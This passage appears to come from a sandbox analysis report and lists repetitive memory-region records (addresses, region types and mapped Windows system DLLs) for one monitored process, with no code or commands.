0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4600 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4601 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4602 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4603 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4604 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4605 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4606 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4607 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4608 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4609 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4610 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4611 start_va = 0x4c0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4618 start_va = 0x70060000 end_va = 0x70067fff monitored = 0 entry_point = 0x70061d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 4619 start_va = 0x7d30000 end_va = 0x7d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d30000" filename = "" Region: id = 4620 start_va = 0x7d70000 end_va = 0x7daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 4621 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4622 start_va = 0x7db0000 end_va = 0x7fb2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007db0000" filename = "" Region: id = 4623 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4624 start_va = 0x7650000 end_va = 0x76effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007650000" filename = "" Region: id = 4625 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4626 start_va = 0x6ef30000 end_va = 0x6fac8fff monitored = 0 entry_point = 0x6f106970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 4627 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4628 start_va = 0x6ed20000 end_va = 0x6ef2efff monitored = 0 entry_point = 0x6edcb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 4629 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4630 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4631 start_va = 0x4c0000 end_va = 0x4c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 4632 start_va = 0x6ea70000 end_va = 0x6ea79fff monitored = 0 entry_point = 0x6ea73200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4633 start_va = 0x6ea30000 end_va = 0x6ea62fff monitored = 0 entry_point = 0x6ea40e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 4634 start_va = 0x72120000 end_va = 0x7226afff monitored = 0 entry_point = 0x72181660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 4635 start_va = 0x4c0000 end_va = 0x4c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 4636 start_va = 0x4c0000 end_va = 0x4c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 4637 start_va = 0x6ea80000 end_va = 0x6eab9fff monitored = 0 entry_point = 0x6ea99be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 4638 start_va = 0x73d60000 end_va = 0x73e27fff monitored = 0 entry_point = 0x73dcae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 4639 start_va = 0x6c600000 end_va = 0x6c76afff monitored = 0 entry_point = 0x6c66e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 4640 start_va = 0x76f0000 end_va = 0x77bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076f0000" filename = "" Region: id = 4641 start_va = 0x7db0000 end_va = 0x82a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007db0000" filename = "" Region: id = 4642 start_va = 0x82b0000 end_va = 0x82effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082b0000" filename = "" Region: id = 4643 start_va = 0x82f0000 end_va = 0x832ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082f0000" filename = "" Region: id = 4644 start_va = 0x8330000 end_va = 0x882dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008330000" filename = "" Region: id = 4645 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4646 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4647 start_va = 0x6c480000 end_va = 0x6c5f2fff monitored = 0 entry_point = 0x6c52d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 4648 start_va = 0x8830000 end_va = 0x892ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008830000" filename = "" Region: id = 4649 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4650 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4651 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4652 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4653 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4654 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4655 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4656 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4657 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4658 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4659 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4660 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4661 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4662 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4663 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4664 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4665 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4666 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4667 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4668 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4669 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4670 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4671 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4672 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4673 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4674 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4675 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4676 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4677 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4678 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4679 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4680 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4681 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4682 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4683 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4684 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4685 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4686 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4687 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4688 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4689 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4690 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4691 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4692 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4693 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4694 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4695 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4696 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4697 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4698 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4699 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4700 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4701 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4702 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4703 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4704 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4705 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4706 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4707 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4708 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4709 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4710 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4711 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4712 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4713 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4714 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4715 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4716 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4717 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4718 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4719 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4720 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4721 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4722 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4723 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4724 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4725 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4726 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4727 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4728 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4729 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4730 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4731 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4732 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4733 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4734 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4735 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4736 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4737 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4738 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4739 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4740 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4741 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4742 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4743 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4744 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4745 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4746 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4747 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4748 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4749 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4750 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4751 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4752 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4753 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4754 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4755 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4756 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4757 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4758 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4759 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4760 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4761 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4762 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4763 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4764 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4765 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4766 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4767 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4768 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4769 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4770 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4771 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4772 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4773 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4774 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4775 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4776 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4777 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4778 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4779 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4780 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4781 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4782 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4783 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4784 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4785 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4786 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4787 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4788 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4789 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4790 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4791 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4792 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4793 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4794 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id 